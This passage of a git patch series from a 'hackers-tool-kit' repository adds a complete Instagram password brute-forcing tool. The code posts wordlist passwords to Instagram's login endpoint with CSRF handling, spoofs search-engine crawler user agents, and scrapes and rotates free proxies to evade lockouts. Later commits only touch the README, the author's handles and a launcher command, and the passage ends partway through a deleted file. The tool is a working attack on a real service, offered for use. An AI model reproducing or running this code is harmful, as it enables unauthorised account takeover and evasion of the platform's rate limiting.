response = self.browser.post( + browser_data['login_url'], data=data, timeout=fetch_time).json() + except: + pass + finally: + return response + + def check_exists(self, response): + if 'user' in response: + Browser.account_exists = response['user'] + + def check_response(self, response): + if 'authenticated' in response: + if response['authenticated']: + return response_codes['succeed'] + + if 'message' in response: + if response['message'] == 'checkpoint_required': + return response_codes['succeed'] + + if response['status'] == 'fail': + return response_codes['locked'] + + if 'errors' in response: + return response_codes['locked'] + + return response_codes['failed'] + + def authenicate(self): + response = self.post_data() + resp = {'attempted': False, 'accessed': False, 'locked': False} + + if debug: + print('pass: {} => {}'.format(self.password, response)) + + if response: + resp['attempted'] = True + resp_code = self.check_response(response) + + if resp_code == response_codes['locked']: + resp['locked'] = True + + if resp_code == response_codes['succeed']: + resp['accessed'] = True + + if Browser.account_exists == None: + self.check_exists(response) + + return resp + + def attempt(self): + self.start_time = time() + token = self.get_token() + + if token: + self.browser.headers.update({'x-csrftoken': token}) + resp = self.authenicate() + + if resp['attempted']: + self.is_attempted = True + + if not resp['locked']: + if resp['accessed']: + self.is_found = True + else: + self.is_locked = True + self.close() + + def close(self): + self.browser.close() + self.is_active = False diff --git a/tools/Instagram/lib/bruter.py b/tools/Instagram/lib/bruter.py new file mode 100644 index 0000000..f21269b --- /dev/null +++ b/tools/Instagram/lib/bruter.py @@ -0,0 +1,176 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Bruter + +from time import time, sleep +from lib.browser import Browser +from lib.display import Display +from threading import Thread, RLock +from lib.proxy_manager import ProxyManager +from lib.password_manager import PasswordManager +from lib.const import max_time_to_wait, max_bots_per_proxy + + +class Bruter(object): + + def __init__(self, username, threads, passlist_path): + self.browsers = [] + self.lock = RLock() + self.password = None + self.is_alive = True + self.is_found = False + self.bots_per_proxy = 0 + self.username = username + self.last_password = None + self.active_passwords = [] + self.proxy_manager = ProxyManager() + self.display = Display(username, passlist_path) + self.password_manager = PasswordManager(username, + passlist_path, threads, self.display) + + def manage_session(self): + if self.password_manager.is_read: + if not self.password_manager.list_size or self.is_found: + self.password_manager.session.delete() + else: + if self.is_found: + self.password_manager.session.delete() + else: + self.password_manager.session.write(self.password_manager.attempts, + self.password_manager.passlist) + + def browser_manager(self): + while self.is_alive: + + for browser in self.browsers: + + if not self.is_alive: + break + + if Display.account_exists == None and Browser.account_exists != None: + Display.account_exists = Browser.account_exists + + if not browser.is_active: + + password = browser.password + + if browser.is_attempted and not browser.is_locked: + + if browser.is_found and not self.is_found: + self.password = password + self.is_found = True + + with self.lock: + self.password_manager.list_remove(password) + else: + with self.lock: + self.proxy_manager.bad_proxy(browser.proxy) + + self.remove_browser(browser) + + else: + if browser.start_time: + if time() - browser.start_time >= max_time_to_wait: + browser.close() + + def remove_browser(self, browser): + if browser in self.browsers: + with self.lock: + self.browsers.pop(self.browsers.index(browser)) + self.active_passwords.pop( + self.active_passwords.index(browser.password) + ) + + def attack(self): + proxy = None + is_attack_started = False + while self.is_alive: + + browsers = [] + for password in self.password_manager.passlist: + + if not self.is_alive: + break + + if not proxy: + proxy = self.proxy_manager.get_proxy() + self.bots_per_proxy = 0 + + if self.bots_per_proxy >= max_bots_per_proxy: + proxy = None + + if not proxy: + continue + + if not password in self.active_passwords and password in self.password_manager.passlist: + browser = Browser(self.username, password, proxy) + browsers.append(browser) + self.bots_per_proxy += 1 + + if not is_attack_started: + self.display.info('Starting attack ...') + is_attack_started = True + + with self.lock: + self.browsers.append(browser) + self.active_passwords.append(password) + + for browser in browsers: + thread = Thread(target=browser.attempt) + thread.daemon = True + try: + thread.start() + except: + self.remove_browser(browser) + + def start_daemon_threads(self): + attack = Thread(target=self.attack) + browser_manager = Thread(target=self.browser_manager) + proxy_manager = Thread(target=self.proxy_manager.start) + password_manager = Thread(target=self.password_manager.start) + + attack.daemon = True + proxy_manager.daemon = True + browser_manager.daemon = True + password_manager.daemon = True + + attack.start() + proxy_manager.start() + browser_manager.start() + password_manager.start() + + self.display.info('Searching for proxies ...') + + def stop_daemon_threads(self): + self.proxy_manager.stop() + self.password_manager.stop() + + def start(self): + self.display.info('Initiating daemon threads ...') + self.start_daemon_threads() + + last_attempt = 0 + while self.is_alive and not self.is_found: + + if last_attempt == self.password_manager.attempts and self.password_manager.attempts: + sleep(1.5) + continue + + for browser in self.browsers: + + self.display.stats( + browser.password, self.password_manager.attempts, len(self.browsers)) + last_attempt = self.password_manager.attempts + self.last_password = browser.password + + if not self.is_alive or self.is_found: + break + + if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers): + self.is_alive = False + + def stop(self): + self.is_alive = False + self.manage_session() + self.stop_daemon_threads() + self.password_manager.session.is_busy = False diff --git a/tools/Instagram/lib/const.py b/tools/Instagram/lib/const.py new file mode 100644 index 0000000..a2cfc84 --- /dev/null +++ b/tools/Instagram/lib/const.py @@ -0,0 +1,76 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Constants + +import os + +# User agents +user_agents = [ + 'Googlebot/2.1 (+http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + + + 'Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (seoanalyzer; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) SitemapProbe', + 'Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', +] + +# Browser +header = { + 'x-ig-app-id': '936619743392459', + 'x-instagram-ajax': '2f6bf8b37c04', + 'x-requested-with': 'XMLHttpRequest', + 'referer': 'https://www.instagram.com/', + 'content-type': 'application/x-www-form-urlencoded' +} + +username_field = 'username' +password_field = 'password' +home_url = 'https://www.instagram.com/' +login_url = 'https://www.instagram.com/accounts/login/ajax/' + +browser_data = { + 'header': header, + 'home_url': home_url, + 'login_url': login_url, + 'username_field': username_field, + 'password_field': password_field +} + +# Login +fetch_time = (10, 15) +response_codes = {'succeed': 0, 'failed': 1, 'locked': -1} + +# Limits +max_bad_proxies = 128 +max_time_to_wait = 18 +max_bots_per_proxy = 16 + +# Misc +debug = False +credentials = 'accounts.txt' +modes = {0: 512, 1: 256, 2: 128, 3: 64} + +# Database +db_dir = 'database' +db_session = 'session.db' +db_path = os.path.join(db_dir, db_session) + +if not os.path.exists(db_dir): + os.mkdir(db_dir) diff --git a/tools/Instagram/lib/display.py b/tools/Instagram/lib/display.py new file mode 100644 index 0000000..5f1a1a9 --- /dev/null +++ b/tools/Instagram/lib/display.py @@ -0,0 +1,160 @@ +# 12/29/2018 +# Author: Mohamed +# Description: Display + +from os import system +from time import sleep +from .const import debug +from colorama import Fore +from builtins import input +from platform import system as platform + + +class Display(object): + + __is_color = None + total_lines = None + account_exists = None + + def __init__(self, username=None, passlist=None, is_color=None): + self.delay = 1.3 + self.username = username + self.passlist = passlist + self.colors_disabled = True + self.cls = 'cls' if platform() == 'Windows' else 'clear' + + if Display.__is_color == None: + Display.__is_color = is_color + + def clear(self): + if not debug or self.colors_disabled: + system(self.cls) + + if self.colors_disabled and self.__is_color: + self.colors_disabled = False + else: + print('\n\n') + + def stats(self, password, attempts, browsers, load=True): + self.clear() + complete = round((attempts/Display.total_lines) * 100, 4) + account_exists = self.account_exists if self.account_exists != None else '' + + if self.__is_color: + print('{0}[{1}-{0}] {1}Wordlist: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.passlist, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Username: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.username.title(), Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Password: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, password, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Complete: {2}{3}%{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, complete, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Attempts: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, attempts, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Browsers: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, browsers, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Exists: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, account_exists, Fore.RESET + )) + + else: + print( + f'[-] Wordlist: {self.passlist}\n[-] Username: {self.username}\n[-] Password: {password}') + + print( + f'Complete: {complete}\n[-] Attempts: {attempts}\n[-] Browsers: {browsers}\n[-] Exists: {account_exists}') + + if load: + sleep(self.delay) + + def stats_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Username: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, self.username.title(), Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Password: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, password, Fore.RESET + )) + else: + print('\n[!] Password Found\n[+] Username: {}\n[+] Password: {}'.format( + self.username.title(), password + )) + + sleep(self.delay) + + def stats_not_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Not Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Password Not Found') + + sleep(self.delay) + + def shutdown(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Shutting Down ...{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Shutting Down ...') + + sleep(self.delay) + + def info(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}i{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, msg, Fore.RESET + )) + else: + print('[i] {}'.format(msg)) + + sleep(2.5) + + def warning(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}!{0}] {1}{2}{3}'.format( + Fore.YELLOW, Fore.RED, msg, Fore.RESET + )) + else: + print('[!] {}'.format(msg)) + + sleep(self.delay) + + def prompt(self, data): + self.clear() + + if self.__is_color: + return input('{0}[{1}?{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, data, Fore.RESET + )) + else: + return input('[?] {}'.format(data)) diff --git a/tools/Instagram/lib/password_manager.py b/tools/Instagram/lib/password_manager.py new file mode 100644 index 0000000..d10c83e --- /dev/null +++ b/tools/Instagram/lib/password_manager.py @@ -0,0 +1,108 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Password manager + +from time import sleep +from hashlib import sha256 +from sys import version_info +from lib.display import Display +from lib.session import Session + + +class PasswordManager(object): + + def __init__(self, username, passlist_path, max_passwords, display): + self.passlist = [] + self.session = None + self.resume = False + self.is_alive = True + self.is_read = False + self.display = display + self.fingerprint = None + self.username = username + self.passwords_removed = 0 + self.passlist_path = passlist_path + self.max_passwords = max_passwords + Display.total_lines = self.count_lines() + + @property + def list_size(self): + return len(self.passlist) + + def list_add(self, password): + if not password in self.passlist: + self.passlist.append(password) + + def list_remove(self, password): + if password in self.passlist: + self.attempts += 1 + self.passlist.pop(self.passlist.index(password)) + self.session.write(self.attempts, self.passlist) + + def count_lines(self): + lines = 0 + + fingerprint = sha256( + self.username.lower().strip().encode() + ).hexdigest().encode() + + self.display.info('Reading wordlist ...') + + with open(self.passlist_path, 'rb') as f: + + for data in f: + lines += 1 + chunk = sha256(data).hexdigest().encode() + fingerprint = sha256(fingerprint + chunk).hexdigest().encode() + + self.fingerprint = fingerprint + self.session = Session(self.fingerprint) + + return lines + 1 + + def read(self): + attempts = 0 + with open(self.passlist_path, 'rt', encoding='utf-8') as passlist: + + for password in passlist: + if not self.is_alive: + break + + if self.resume: + self.attempts, self.passlist = self.session.read() + + if attempts < (self.attempts + self.list_size): + attempts += 1 + continue + else: + self.resume = False + + password = password.replace('\n', '').replace( + '\r', '').replace('\t', '') + + if self.list_size < self.max_passwords: + self.list_add(password) + else: + while self.list_size >= self.max_passwords and self.is_alive: + sleep(0.5) + + if self.is_alive: + self.list_add(password) + self.session.write(self.attempts, self.passlist) + + if self.is_alive: + self.is_read = True + + @property + def attempts(self): + return self.passwords_removed + + @attempts.setter + def attempts(self, n): + self.passwords_removed = n + + def start(self): + self.read() + + def stop(self): + self.is_alive = False diff --git a/tools/Instagram/lib/proxy.py b/tools/Instagram/lib/proxy.py new file mode 100644 index 0000000..02281d5 --- /dev/null +++ b/tools/Instagram/lib/proxy.py @@ -0,0 +1,26 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy + + +class Proxy(object): + + def __init__(self, proxy): + self.proxy = proxy + + @property + def ip(self): + return self.proxy['ip'] + + @property + def port(self): + return self.proxy['port'] + + @property + def country(self): + return self.proxy['country'] + + @property + def addr(self): + addr = '{}:{}'.format(self.proxy['ip'], self.proxy['port']) + return {'http': addr, 'https': addr} diff --git a/tools/Instagram/lib/proxy_list.py b/tools/Instagram/lib/proxy_list.py new file mode 100644 index 0000000..3cbe104 --- /dev/null +++ b/tools/Instagram/lib/proxy_list.py @@ -0,0 +1,18 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: A list that will manage proxies + + +class ProxyList(object): + + def __init__(self): + self.list = [] + + def __contains__(self, proxy): + for _proxy in self.list: + if _proxy.ip == proxy['ip'] and _proxy.port == proxy['port']: + return True + return False + + def append(self, proxy): + self.list.append(proxy) \ No newline at end of file diff --git a/tools/Instagram/lib/proxy_manager.py b/tools/Instagram/lib/proxy_manager.py new file mode 100644 index 0000000..6bf3ee4 --- /dev/null +++ b/tools/Instagram/lib/proxy_manager.py @@ -0,0 +1,42 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy manager + +from time import sleep +from queue import Queue +from .scraper import Scraper +from .bad_proxies import BadProxies + + +class ProxyManager(object): + + def __init__(self): + self.is_alive = True + self.proxies = Queue() + self.scraper = Scraper() + self.bad_proxies = BadProxies() + + def collect(self): + while self.is_alive: + if not self.proxies.qsize(): + + for proxy in self.scraper.proxies: + if not proxy in self.bad_proxies: + self.proxies.put(proxy) + + sleep(5) + + def bad_proxy(self, proxy): + if not proxy in self.bad_proxies: + self.bad_proxies.append(proxy) + + def get_proxy(self): + if self.proxies.qsize(): + return self.proxies.get() + + def start(self): + self.collect() + + def stop(self): + self.is_alive = False + self.scraper.is_alive = False \ No newline at end of file diff --git a/tools/Instagram/lib/scraper.py b/tools/Instagram/lib/scraper.py new file mode 100644 index 0000000..529d249 --- /dev/null +++ b/tools/Instagram/lib/scraper.py @@ -0,0 +1,123 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy scraper + +from time import sleep +from requests import get +from .proxy import Proxy +from random import randint +from .display import Display +from .proxy_list import ProxyList +from bs4 import BeautifulSoup as bs +from threading import Thread, RLock +from .const import fetch_time, debug + + +class Scraper(object): + + def __init__(self): + self.lock = RLock() + self.is_alive = True + self.display = Display() + self.scraped_proxies = [] + self.extra_proxies_link = 'http://spys.me/proxy.txt' + + self.links = [ + 'https://sslproxies.org', + 'https://free-proxy-list.net', + 'https://free-proxy-list.net/anonymous-proxy.html' + ] + + def parse_extra_proxy(self, proxy): + proxy = proxy.split(' ') + addr = proxy[0].split(':') + + return { + 'ip': addr[0], + 'port': addr[1], + 'country': proxy[1].split('-')[0] + } + + def parse_proxy(self, proxy): + proxy = proxy.find_all('td') + if proxy[4].string != 'transparent' and proxy[5].string != 'transparent': + return { + 'ip': proxy[0].string, + 'port': proxy[1].string, + 'country': proxy[3].string + } + + def scrape_proxies(self, link): + proxies = [] + + try: + proxies = bs(get(link, timeout=fetch_time).text, + 'html.parser').find('tbody').find_all('tr') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(link)) + + for proxy in proxies: + with self.lock: + _proxy = self.parse_proxy(proxy) + if _proxy: + self.scraped_proxies.append(_proxy) + + def scrape_extra_proxies(self): + proxies = [] + + try: + if self.is_alive: + proxies = get(self.extra_proxies_link, + timeout=fetch_time).text.split('\n') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(self.extra_proxies_link)) + + for proxy in proxies: + if '-H' in proxy and '-S' in proxy: + with self.lock: + self.scraped_proxies.append(self.parse_extra_proxy(proxy)) + + @property + def proxies(self): + proxy_list = ProxyList() + + threads = [] + threads = [Thread(target=self.scrape_proxies, args=[link]) + for link in self.links] + threads.append(Thread(target=self.scrape_extra_proxies)) + + index = 0 + while index < len(threads) and self.is_alive: + thread = threads[index] + + try: + thread.daemon = True + thread.start() + index += 1 + except: + sleep(0.5) + + while self.is_alive and len(threads): + for thread in [thread for thread in threads if not thread.is_alive()]: + threads.pop(threads.index(thread)) + sleep(0.5) + + if self.is_alive: + for proxy in self.scraped_proxies: + + if not proxy in proxy_list: + proxy_list.append(Proxy(proxy)) + + return [proxy_list.list.pop(randint(0, len(proxy_list.list)-1)) for _ in range(len(proxy_list.list))] diff --git a/tools/Instagram/lib/session.py b/tools/Instagram/lib/session.py new file mode 100644 index 0000000..91fd976 --- /dev/null +++ b/tools/Instagram/lib/session.py @@ -0,0 +1,106 @@ +# Date: 05/05/2018 +# Author: Mohamed +# Description: Session Handler + +import json +import sqlite3 +from os import remove +from sys import version_info +from lib.const import db_path +from os.path import exists as path +from csv import DictWriter, DictReader + + +class DatabaseWrapper: + + def __init__(self, db_name): + self.db_name = db_name + + def db_query(self, cmd, args=[], fetchone=True): + database = sqlite3.connect(self.db_name) + sql = database.cursor().execute(cmd, args) + data = sql.fetchone()[0] if fetchone else sql.fetchall() + database.close() + return data + + def db_execute(self, cmd, args=[]): + database = sqlite3.connect(self.db_name) + database.cursor().execute(cmd, args) + database.commit() + database.close() + + +class Session(DatabaseWrapper): + + is_busy = False + + def __init__(self, fingerprint): + super().__init__(db_path) + self.fingerprint = fingerprint + self.create_tables() + + def create_tables(self): + self.db_execute(''' + CREATE TABLE IF NOT EXISTS + Session( + session_id TEXT, + attempts INTEGER, + list TEXT, + + PRIMARY KEY(session_id) + ); + ''') + + @property + def exists(self): + return self.db_query('SELECT COUNT(*) FROM Session WHERE session_id=?;', [self.fingerprint]) + + def read(self): + + if not self.exists: + return 0, [] + + attempts, list = self.db_query(''' + SELECT attempts, list + FROM Session + WHERE session_id=? + ''', args=[self.fingerprint], fetchone=False)[0] + + return attempts, json.loads(list) + + def _write(self, attempts, _list): + + if not self.exists: + self.db_execute(''' + INSERT INTO Session(session_id, attempts, list) + VALUES(?, ?, ?); + ''', args=[self.fingerprint, attempts, json.dumps(_list)]) + return + + self.db_execute(''' + UPDATE Session + SET attempts=?, list=? + WHERE session_id=?; + ''', args=[attempts, json.dumps(_list), self.fingerprint]) + + def write(self, attempts, _list): + if not attempts: + return + + while Session.is_busy: + pass + + try: + Session.is_busy = True + self._write(attempts, _list) + except: + pass + finally: + Session.is_busy = False + + def delete(self): + if self.exists: + self.db_execute(''' + DELETE FROM Session + WHERE session_id=?; + ''', args=[self.fingerprint]) From 55d972d139867d69c454ad6d32b85585c35df822 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 03:12:47 -0400 Subject: [PATCH 190/214] Update htk.py --- htk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/htk.py b/htk.py index a133256..25464eb 100644 --- a/htk.py +++ b/htk.py @@ -1002,7 +1002,7 @@ def insta(): jl = raw_input("WORDLIST> ") print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" k = raw_input("MODE> ") - ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} {2}'.format(insta,jl,k) + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) os.system(ma) #------------------------# #INSTAGRAM BRUTEFORCE END# From 060784b435835df5ed880ff325e25957038ea53a Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 7 Sep 2019 13:04:05 -0400 Subject: [PATCH 191/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 96ff396..350df80 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # hackers-tool-kit Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff to see updates check on -my instagram @tuf_unkn0wn +my instagram @unkn0wn_bali ![](tools/screenshot1.png) From 4396c2d6d885161e5522404d3f107cbff870b7ca Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 7 Sep 2019 13:05:15 -0400 Subject: [PATCH 192/214] Update htksecure.py --- htksecure.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/htksecure.py b/htksecure.py index b54e690..eeac98f 100644 --- a/htksecure.py +++ b/htksecure.py @@ -10,7 +10,7 @@ print "\033[92mWould you like to continue? y or n\033[0m" h = raw_input("?: ") if h == "n": - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" sys.exit() if h == "y": print "\033[93m------------------------\033[0m" From 24facc12fa4829226b089d2d73e98dfc73de2345 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 7 Sep 2019 13:06:08 -0400 Subject: [PATCH 193/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 350df80..96ff396 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # hackers-tool-kit Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff to see updates check on -my instagram @unkn0wn_bali +my instagram @tuf_unkn0wn ![](tools/screenshot1.png) From f04ac29f4d5f019543147c2ad033b8d258da98a5 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 7 Sep 2019 13:08:57 -0400 Subject: [PATCH 194/214] Update htksecure.py --- htksecure.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/htksecure.py b/htksecure.py index eeac98f..b54e690 100644 --- a/htksecure.py +++ b/htksecure.py @@ -10,7 +10,7 @@ print "\033[92mWould you like to continue? y or n\033[0m" h = raw_input("?: ") if h == "n": - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" sys.exit() if h == "y": print "\033[93m------------------------\033[0m" From f9f80fc6a0306205724c0fec30194887d5296326 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 29 Nov 2019 18:49:20 +0000 Subject: [PATCH 195/214] Update README.md --- README.md | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/README.md b/README.md index 96ff396..ea14445 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,5 @@ # hackers-tool-kit -Its a framework filled with alot of options and hacking tools you use directly in the script -from brute forcing to payload making im still adding more stuff to see updates check on -my instagram @tuf_unkn0wn +Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff i now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy to see updates check on my instagram @tuf_unkn0wn ![](tools/screenshot1.png) From dc80722e215401286f131f43eed8bdd85febb2a5 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 29 Nov 2019 18:51:19 +0000 Subject: [PATCH 196/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ea14445..fd8f7d3 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # hackers-tool-kit -Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff i now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy to see updates check on my instagram @tuf_unkn0wn +Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making. Im still trying to think of what to add to the script. I now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy. To see updates check on my instagram @tuf_unkn0wn. ![](tools/screenshot1.png) From 90f262ce869467bc05bc4af3bb82f0fbe5dbc6d0 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 29 Nov 2019 19:17:09 +0000 Subject: [PATCH 197/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fd8f7d3..c40c193 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # hackers-tool-kit -Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making. Im still trying to think of what to add to the script. I now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy. To see updates check on my instagram @tuf_unkn0wn. +Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making. Im still trying to think of what to add to the script. I now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy. To see updates check on my instagram @tuf_unkn0wn or if there are any problems message me on instagram. ![](tools/screenshot1.png) From 5e1f22238a73c72a2fc805f56401eef71a598820 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 04:54:52 +0000 Subject: [PATCH 198/214] Delete htk.py --- htk.py | 3233 -------------------------------------------------------- 1 file changed, 3233 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 25464eb..0000000 --- a/htk.py +++ /dev/null @@ -1,3233 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @tuf_unkn0wn -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ 